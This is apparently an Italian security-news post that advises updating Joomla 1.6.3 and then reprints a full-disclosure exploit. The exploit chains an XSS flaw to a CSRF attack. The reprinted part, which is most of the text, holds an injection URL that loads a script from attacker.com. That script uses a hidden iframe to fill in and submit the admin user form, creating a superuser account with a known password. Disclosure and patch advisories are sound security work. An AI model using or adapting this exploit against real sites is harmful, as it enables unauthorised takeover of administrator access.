Una vulnerabilità di tipo XSS - CSRF affligge Joomla 1.6.3, si raccomanda (a chi ancora non l'avesse fatto) di procedere con l'aggiornamento alla 1.6.4 rilasciata già a fine giugno.
Seguono i dettagli della vulnerabilità:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS
vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to
execute a CSRF vulnerability to create a superuser account.

/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
Vuln Link:
index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><s
cript src=http://attacker.com/joom163.js></script>
*/
document.writeln('<iframe id="iframe"
src="http://victim.com/administrator/index.php?option=com_users&view=user&l
ayout=edit" width="0" height="0" style="visibility:hidden;"
onload="read()"></iframe>');
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
document.getElementById("iframe").contentDocument.forms[0].jform_name.value
= name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.v
alue = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.v
alue = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.
value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.valu
e = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("
1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")
[11].onclick();
}